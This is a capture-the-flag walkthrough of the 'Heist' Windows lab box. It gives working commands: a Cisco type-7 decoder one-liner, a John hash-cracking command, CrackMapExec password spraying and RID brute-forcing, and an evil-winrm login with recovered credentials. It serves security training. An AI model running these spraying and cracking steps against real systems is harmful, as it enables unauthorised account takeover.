Post

Heist

A guest-accessible IIS support portal leaks a partial Cisco router config; the reversible type-7 passwords decode instantly and the type-5 MD5crypt cracks with John, then credential reuse plus SMB RID-bruteforcing and password spraying yields a WinRM shell and the user flag.

Heist

Overview

Heist is an easy-difficulty Windows box that chains a classic information-disclosure-into-credential-reuse path. A guest-accessible “Issues” portal on IIS leaks a fragment of a Cisco IOS router configuration. The Cisco type-7 passwords are reversible obfuscation and decode immediately; the type-5 MD5crypt secret cracks offline with John. Those passwords are reused as Windows account passwords, so spraying with CrackMapExec, enumerating extra users via RID brute-force, and re-spraying lands a WinRM login as Chase. This post covers recon through the user flag.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

Enumeration and credential-reuse: Cisco type-7 decode plus MD5crypt crack, then SMB password spray and RID-bruteforce to WinRM — realistic info-disclosure chain, no CVE.

Recon

PortServiceNotes
80/tcpMicrosoft IIS 10.0“Issues” portal, guest login
135/tcpMSRPCWindows RPC
445/tcpSMBmicrosoft-ds
5985/tcpWinRMremote management
1
2
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.X | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.10.X

IIS on 80, RPC on 135, SMB on 445, and WinRM on 5985 — the WinRM port hints that valid credentials may grant a remote shell.

Enumeration

Browsing to the site shows a login page with a “Login as guest” option. Logging in as guest opens an Issues page. A ticket from user Hazard says he’s having trouble with a Cisco router and attaches part of the configuration:

1
2
3
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

That’s one secret 5 (MD5crypt) hash and two password 7 (Cisco type-7) hashes. Type-7 is a reversible cipher with a published key table — it is obfuscation, not encryption. Type-5 is salted MD5, crackable offline.

Foothold

1 — Decode the Cisco type-7 passwords. Type-7 reverses instantly with a small XOR decoder (or any online Cisco type-7 tool):

1
2
python3 -c 'import sys;e="dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87";h=sys.argv[1];s=int(h[:2]);print("".join(chr(int(h[i:i+2],16)^ord(e[(s+(i-2)//2)%len(e)])) for i in range(2,len(h),2)))' 02375012182C1A1D751618034F36415408
# -> Q4)sJu\Y8qz*A3?d

The two type-7 values decode to $uperP@ssword and Q4)sJu\Y8qz*A3?d.

2 — Crack the type-5 MD5crypt hash with John. The $1$ prefix is MD5crypt, and rockyou contains the password:

1
2
3
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > hashes
john --format=md5crypt -w=/usr/share/wordlists/rockyou.txt hashes
# -> stealth1agent

3 — Spray the recovered passwords over SMB. The Issues portal exposed usernames Hazard and Administrator. Spray the three passwords and one sticks:

1
2
3
4
printf '%s\n' 'stealth1agent' '$uperP@ssword' 'Q4)sJu\Y8qz*A3?d' > passwords.txt
printf '%s\n' 'hazard' 'administrator' > users.txt
crackmapexec smb 10.10.10.X -u users.txt -p passwords.txt --continue-on-success
# -> [+] SUPPORTDESK\hazard:stealth1agent

4 — RID-bruteforce for more users. Hazard can’t WinRM, but a valid credential lets us cycle RIDs off the host SID to enumerate accounts:

1
2
crackmapexec smb 10.10.10.X -u hazard -p stealth1agent --rid-brute
# -> 1009: support, 1012: Chase, 1013: Jason

5 — Re-spray against the new users. Test the same passwords against the discovered usernames:

1
2
3
printf '%s\n' 'hazard' 'support' 'Chase' 'Jason' > new_users.txt
crackmapexec smb 10.10.10.X -u new_users.txt -p passwords.txt --continue-on-success
# -> [+] SUPPORTDESK\Chase:Q4)sJu\Y8qz*A3?d

Chase reuses the decoded type-7 password — and Chase is in the Remote Management Users group.

User flag

Chase’s credentials work over WinRM:

1
2
3
evil-winrm -i 10.10.10.X -u Chase -p 'Q4)sJu\Y8qz*A3?d'
*Evil-WinRM* PS C:\Users\Chase\Documents> type ..\Desktop\user.txt
# [redacted]

A WinRM shell as supportdesk\chase and the user flag are ours.

Privilege escalation (dumping the Firefox process memory to recover the Administrator password) is left as an exercise — this post stops at user.

This post is licensed under CC BY 4.0 by the author.